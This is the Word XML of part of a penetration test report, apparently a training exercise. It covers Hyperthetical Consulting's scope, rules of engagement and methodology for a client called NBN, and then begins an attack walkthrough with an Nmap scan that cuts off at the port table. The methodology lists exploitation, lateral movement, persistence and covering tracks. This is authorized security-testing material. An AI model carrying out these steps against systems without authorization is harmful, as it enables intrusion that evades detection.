    <w:p w14:paraId="6AE361D9" w14:textId="3F08DDB6" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc129370245"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Internal Network Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="302DA590" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62355629" w14:textId="55D8577B" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>If the assessment team gains access to the internal network, they will continue the assessment to find internal vulnerabilities and determine impacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33373C5C" w14:textId="77777777" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00663942">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1705"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="5665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="7620547A" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1700C6D9" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D92749" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>IP Address/URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC4D4B1" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="148721DD" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5155C5C7" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62914E10" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Not Provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B6CB5CB" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Vendor-hosted VPN for NBN employees.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="53F593AD" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2ACB2B" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Physical Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C0E6B8" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E60003A" w14:textId="77777777" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Office locations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF603EE" w14:textId="0F2F2F30" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00663942" w:rsidP="00FD4229">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20320806" w14:textId="68DD5D22" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc129370246"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Rules of Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0F4AD7D1" w14:textId="69301B8F" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>All technical testing will be conducted using proven methodologies to avoid disruption of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E1AC2" w14:textId="5E63C4A2" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will not perform denial-of-service testing or utilize techniques deemed likely to cause a system outage or service disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B5CDC" w14:textId="4A3C4559" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will not attack trusted third-party entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8264F" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRDefault="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc129370247"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66652AA9" w14:textId="129B1102" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="0061682E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1A9AFF6B" w14:textId="2C9B7161" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The assessment team will conduct testing from both an internal and external standpoint using only proven methodologies.</w:t>
      </w:r>
      <w:r w:rsidR="00AE6477">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the Hyperthetical team will have no prior knowledge of, or access to, the NBN networks or systems, the testing team will conduct a “black box penetration test.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A50FF" w14:textId="10931E19" w:rsidR="007E1592" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="007E1592">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The penetration testing framework will include the following steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69A4D7" w14:textId="183C5CA8"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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25606F2D"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Collect publicly available information about the target organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71105920" w14:textId="6DCE3F75"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Search for known vulnerabilities in the target network using publicly available information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EDC4F" w14:textId="00630054"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Scan the target network to identify live hosts, ports, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423682C3"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Identify the operating systems, applications, and their versions running on the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B9776" w14:textId="7946F222"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 xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="00EB4C33" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEE88C"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Conduct vulnerability scanning and testing to identify potential vulnerabilities in the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C3341" w14:textId="40E3CA51"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 xml:space="preserve">Use manual </w:t>
      </w:r>
      <w:r w:rsidR="005E496E" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>and automated techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidR="005E496E" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzing </w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>to identify vulnerabilities that automated scanners may miss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032709C7"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Prioritize the vulnerabilities based on their severity and likelihood of exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E41D4" w14:textId="3AFE37BB" w:rsidR="00EB4C33" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C30C78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Verify the identified vulnerabilities and ensure that they are exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C13EC9" w14:textId="7FC28DB4"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Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00EB4C33" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00FF5561" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57752AC9" w14:textId="56058616"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Exploit any discovered vulnerabilities to gain unauthorized access to the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F75144" w14:textId="18EDCB54"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Use privilege escalation techniques to elevate the privileges of any compromised accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF56BED" w14:textId="1EF530CF"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Conduct lateral movement to expand the compromise to other systems on the network or gain access to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A5538" w14:textId="77777777"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Maintain persistence on the compromised systems to ensure continued access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C33F54" w14:textId="40E3EAF5"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Cover tracks to avoid detection by the target organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04844042" w14:textId="2EEA6214" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc129370248"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Deliverables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="70C17460" w14:textId="3CA48F6A" w:rsidR="00FF5561" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>At the conclusion of the penetration test, Hyperthetical Consulting will deliver the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EA4EF" w14:textId="2BAB5F7E" w:rsidR="00FF5561" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Comprehensive Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B2B6E" w14:textId="2FCF77B1"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Separate executive report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156A1A3" w14:textId="3BAC4965"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The executive summary will be delivered in PDF format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA0164" w14:textId="6BE84396" w:rsidR="00FF5561" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4875B572" w14:textId="748AF291"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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1188973F" w14:textId="2CC8BA9A"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Narrative attack walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF8E3F" w14:textId="7D578CF3" w:rsidR="00FF5561" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00E03870" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">are arranged </w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">by level of </w:t>
      </w:r>
      <w:r w:rsidR="00E03870" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4ED7D8" w14:textId="0F0A8E67" w:rsidR="00FF5561" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Recommendations and proposed remediation steps, including software solutions and best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305D06C" w14:textId="3FF330A5" w:rsidR="00FF5561" w:rsidRDefault="00000000" w:rsidP="00FF5561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The report will be delivered in PDF format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255E8E7" w14:textId="77777777" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D44F222" w14:textId="041CF3F9" w:rsidR="00646037" w:rsidRDefault="00F351BE" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Narrative – A</w:t>
      </w:r>
      <w:r w:rsidR="00646037">
        <w:t>ttack Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA53D3" w14:textId="68AFF87B" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB4DA0" w14:textId="4970BEEA" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
      <w:r>
        <w:t xml:space="preserve">The Hyperthetical assessment team began the penetration test by performing a full port scan of the external IP space using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C528B6">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:t>. After discovering open ports, they performed more in depth scanning to enumerate the services running on each port. The results included two web services, FTP, and SSH.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C528B6" w14:paraId="40D932E8" w14:textId="77777777" w:rsidTr="00C528B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="22D487D0" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Nmap scan report for 172.16.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78563FA5" w14:textId="12E2AF7F" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Host is up (0.00030s latency).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD4901C" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PORT     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>STATE  SERVICE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">    VERSION</w:t>
            </w:r>
          </w:p>
